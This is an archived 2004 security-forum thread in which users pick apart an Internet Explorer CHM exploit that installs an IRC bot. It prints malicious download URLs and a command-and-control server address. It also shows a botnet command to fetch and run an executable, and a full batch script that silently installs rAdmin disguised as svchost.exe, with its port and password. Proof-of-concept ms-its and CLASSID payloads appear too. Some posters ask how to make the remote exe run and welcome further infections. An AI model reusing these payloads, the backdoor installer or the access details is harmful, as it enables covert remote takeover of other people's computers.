New Iesploit!

GovernmentSecurity.org > The Archives > General Network Security

EXPLOiTED

Apr 7 2004, 02:47 AM

Hey, i guess this is the new IESploit. But anyway..i was checking it out...Heres the link.http://www.goon4hire.com/winrg.swf/ . It downloads a file called winumc.exe in your SYSTEM32\ then Execs it. It connects to this irc server 193.14.113.1:6667

The server has a on join version thing..if it doesnt haev a certain version it glines you....so i told my friend to run the exe and sniff since i tied to connect to it right when i seen my fierwall asking to go there...heres what we have
So i started Sniffing...heres what i got

[10:45:40pm] [@Merkin] :zeexc!zpave@free-ppp076.modems.cwru.edu JOIN :#BOTS1.
[10:45:42pm] [@Merkin] :losangeles.ca.us.undernet.org 332 zeexc #BOTS1. :.mirc spread stop
[10:45:42pm] [@Merkin] :losangeles.ca.us.undernet.org 333 zeexc #BOTS1. _s_ 1081296848
[10:45:42pm] [@Merkin] :losangeles.ca.us.undernet.org 353 zeexc @ #BOTS1. :zeexc @NickServ &ChanServ &_s_
[10:45:42pm] [@Merkin] :losangeles.ca.us.undernet.org 366 zeexc #BOTS1. :End of /NAMES list.
[10:45:42pm] [@Merkin] :losangeles.ca.us.undernet.org 302 zeexc :zeexc=+zpave@free-ppp076.modems.cwru.edu
[10:45:42pm] [@Merkin] :losangeles.ca.us.undernet.org 302 zeexc :zeexc=+zpave@free-ppp076.modems.cwru.edu
[10:45:42pm] [@Merkin] :losangeles.ca.us.undernet.org 302 zeexc :zeexc=+zpave@free-ppp076.modems.cwru.edu

and him giving cmds
:_s_!OPER@OPER PRIVMSG #BOTS1. :zvkat: .download http://www.mega3.net/other/ra.exe c:\tmp03.exe 1

easternerd

Apr 7 2004, 02:54 AM

great information my friend

thankyou.

crash3rzz

Apr 7 2004, 02:57 AM

yeh this ownz ty

EXPLOiTED

Apr 7 2004, 03:08 AM

A vulnerability has been discovered in snmpdx and a buffer overflow found in mibiisa which may be exploited by a local or a remote attacker to gain root access on the affected system. The snmpdx master agent and the mibiisa agent run as daemons with root privileges on the system

SNMP Vuln...Runnign Win2000....the server that is

EXPLOiTED

Apr 7 2004, 03:50 AM

ftp://(filtered):****@193.14.113.1 691:87

...
Seems the Guy decided to tag a ftp on it also....bah...homo rooters....I have some clues that this box is NIX..im not sure though

Tyrano

Apr 7 2004, 04:15 AM

This is the new flash exploit? or windows IE.

EXPLOiTED

Apr 7 2004, 04:34 AM

Appears u get the exe loaded at this site aswell

http://www.ilwig.net/rofl.swf

Truepower

Apr 7 2004, 04:44 AM

heres the html from the illwig site:

<html> <head><title>Haha</title><style>body { overflow-y: hidden; margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; }</style><script>function readCookie(name) { var cookieValue = ""; var search = name + "="; if(document.cookie.length > 0) { offset = document.cookie.indexOf(search); if (offset != -1) { offset += search.length; end = document.cookie.indexOf(";", offset); if (end == -1) end = document.cookie.length; cookieValue = unescape(document.cookie.substring(offset, end)) } } return cookieValue;} if (readCookie("sVisited") != 1) self.location.href = "index1.html";</script></head> <body> <table width="100%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="15%" height="341" align="left" valign="top"><p><a href="http://www.governmentsecurity.org/forum/"><img src="../new_images/forums2.png" alt="hacking exploits security forum" width="189" height="102" border="0" /></a><br /> <a href="http://www.governmentsecurity.org/forum/"><img src="../new_images/hacking.png" alt="hacking" width="190" height="84" border="0" /></a><br/> <a href="../compliance.php"><img src="../new_images/compliance_articles.png" alt="compliance articles" width="190" height="84" border="0" /></a><br/> <a href="http://governmentsecurity.bitpipe.com/data/detail?id=1206033259_610&type=RES&psrc=TPP"><img src="../new_images/main_ad_1.png" alt="security white papers" width="190" height="84" border="0" /></a><br/> <a href="../directory.php"><img src="../new_images/main_ad_2.png" alt="information security consultant" width="190" height="84" border="0" /></a></p> </td> <td width="85%" align="left" valign="top"> <div align="center"><embed src="flash.swf" width="100%" height="100%" border=0></div>
</body>
</html>

EXPLOiTED

Apr 7 2004, 05:02 AM

hmm....yes...heres what im figured

http://www.ilwig.net/rofl.swf/

http://www.ilwig.net/rofl.swf/index1.html

http://www.ilwig.net/rofl.swf/flash.swf

gerok

Apr 7 2004, 05:09 AM

http://brasky.com/1/

the chm file is in there...i'm dling the chm file and decompiling it at this moment...how does this sploit work?

EXPLOiTED

Apr 7 2004, 05:15 AM

hm...so this is the IE CHM Sploit...

crash3rzz

Apr 7 2004, 05:19 AM

<@EmericaX> ha
<@EmericaX> hmm
<@Merkin> thisis like a fuckin puzzle

<Merkin> [10:45:10pm] [@Merkin] :_s_!OPER@OPER PRIVMSG #BOTS1. :zvkat: .download http://www.mega3.net/other/ra.exe c:\tmp03.exe 1

the oper makes the bots download that file and save it as tmp03.exe
ofcourse this is the link +

http://www.mega3.net/other/ra.exe

and there are the files

he uses rAdmin , mother (filtered)

this is the bat code

CODE

@echo off

echo REGEDIT4> settings.reg
echo [-HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\]>> settings.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\]>> settings.reg
echo "DisableTrayIcon"=hex:01,00,00,00>> settings.reg
echo "DisableBeep"=hex:01,00,00,00>> settings.reg
regedit.exe /s settings.reg
del settings.reg

mkdir %SYSTEMROOT%\system

move ___1 %SYSTEMROOT%\system\svchost.exe
move ___2 %SYSTEMROOT%\system\admdll.dll
move ___3 %SYSTEMROOT%\system\raddrv.dll

%SYSTEMROOT%\system\svchost.exe /install /silence
%SYSTEMROOT%\system\svchost.exe /port:715 /pass:bullshit /save /silence
%SYSTEMROOT%\system\svchost.exe /start

echo REGEDIT4> settings.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\r_server\]>> settings.reg
echo "DisplayName"="Remote Services Handler">> settings.reg
echo "Description"="Provides authorized system services handling between clients and servers on a local area or wide area network environments. If this service is disabled, any services that explicitly depend on it will fail to start.">> settings.reg
regedit.exe /s settings.reg
del settings.reg

del deploy.bat

well seems to us he loaded these files to #Bots1 only
maybe fastbots? so he can (filtered) around

well... its good maybe more machines will get infected

Client for rAdmin: http://www.famatech.com/download/radmin21.zip

port = 715
pass = bullshit

mfld

Apr 7 2004, 05:25 AM

EXPLOiTED

Apr 7 2004, 05:27 AM

lol

gerok

Apr 7 2004, 08:38 AM

this is the html file in the chm...

QUOTE

how do you get the actual chm to load? i tried...

QUOTE

Help please? thanks!

dr0zaxx

Apr 7 2004, 12:21 PM

The following proof-of-concept has been supplied:

ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm

The following example demonstrates the exploitation of this issue:

The attacker would create a script (ie; launch.html) containing a CLASSID exploit as a CHM such as:
<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111123' CODEBASE='trojan.exe'>

The attacker would then utilize another script tag to execute the launch.html such as:
<IMG SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'><IMG
SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'><IMG
SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'><IFRAME
SRC='redirgen.php?url=URL:ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'>

Additional proof-of-concepts have been published by http-equiv and Jelmer that demonstrate different payloads:
http://www.malware.com/junk-de-lux.html
http://ip3e83566f.speed.planet.nl/security...one/exploit.htm

Additional proof-of-concepts were provided in the "IE ms-its: and mk:@MSITStore: vulnerability" BugTraq post by Roozbeh Afrasiabi.

Jelmer also released the following proof-of-concept example which may potentially bypass some filters due to using encoded characters in the exploit string:

ms-its:mhtml:file://C:\foo.mht!${PATH}/EXPLOIT.CHM::/exploit.htm

This issue is known to be exploited in the wild.

gerok

Apr 7 2004, 12:48 PM

thank you! you rock!!!!

da_cash

Apr 7 2004, 01:40 PM

great info....thank you...i will check it

ind0r

Apr 8 2004, 03:42 PM

I saw it before in securityfocus. There is also solution (.reg) for IE.

K1LL3RB0Y

Apr 11 2004, 07:55 PM

QUOTE (gerok @ Apr 7 2004, 08:38 AM)

this is the html file in the chm...

QUOTE

how do you get the actual chm to load? i tried...

QUOTE

Help please? thanks!

hmm thiss one works only it download it only it not load it how can ya load the exe file when it is on the remote pc

bwc

Apr 17 2004, 01:26 PM

man ,can you give me a file ---"redirgen.php ",this is the one which is very important.thanks a lot.

binary_hashes

Apr 17 2004, 03:33 PM

please we want details abt this

LKM

Apr 17 2004, 08:10 PM

I saw those links on various channels on EFNet.....beware !
Or patch hard

Serhat

Apr 18 2004, 07:34 AM

QUOTE (EXPLOiTED @ Apr 7 2004, 02:47 AM)

when i seen my fierwall asking to go there..

isn't very smart then..
if he was a bit smart (s)he would make the exploit use some commands like check wheter the zonealarm/nis and other firewalls are running...
Atleast that would be smart...

Serhat

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.